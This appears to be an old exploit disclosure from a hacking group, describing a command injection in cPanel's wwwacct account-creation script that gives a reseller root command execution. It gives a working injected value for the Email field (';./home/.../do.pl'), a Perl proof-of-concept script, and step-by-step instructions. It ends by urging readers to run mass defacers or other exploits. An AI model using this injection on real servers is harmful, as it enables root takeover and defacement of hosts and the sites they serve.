By : Ali Jasbi ( IHST security & hacking Research team) WwW.Hackerz.ir Vendor : Cpanel.net Version : ALL !! Risk : Very high What u can do with this bug is : u can have a access to all the server with reseller privilege (Th3 r00t) how it's work ? when u want to create an account in shell what will happen ? ./script/wwwact [domainname] [username] [password] [Email address] lab lab lab that u can run it with a web base program ! ( cpanel : doamin:2086) example : http://domain:2086/scripts/wwwacct [domainname] [username] [password] [Email address] lab lab lab it means you got a access to wwwacct in the scripts folder (Th3 r00t) so u can run other command with root access like that ./scripts/wwwactt domain.com domain password ali (at) hackerz (dot) ir [email concealed];./home/hackerz/public_html/do.pl ( your command now is ./home/hackerz/public_html/do.pl) that u can Likewise run it on the web base program.what u need to do is just write ali (at) hackerz (dot) ir [email concealed];./home/hackerz/public_html/do.pl in Email text box when u want to create an account. ()()()()()()()()()()()()() Test it: ++++++++++++++++++++++++++ Step 1 Save this file in /home/user/public_html/do.pl . #!/usr/bin/perl $old='/home/user/public_html/test.txt'; $new='/home/root/kon.txt'; rename $old, $new; ++++++++++++++++++++++++++ step 2 make a text file named test.txt in your public_html directory. path will be : /home/user/public_html/test.txt . ++++++++++++++++++++++++++ step 3 create an account and write ali (at) hackerz (dot) ir [email concealed];./home/user/public_html/do.pl in E-mail Address text box then click on the "create" button. Yes , you can find your file in /home/root/ . ++++++++++++++++++++++++++ ()()()()()()()()()()()()() you can run your own code !(mass defacer, exploit's or everything that u want). Enjoy it...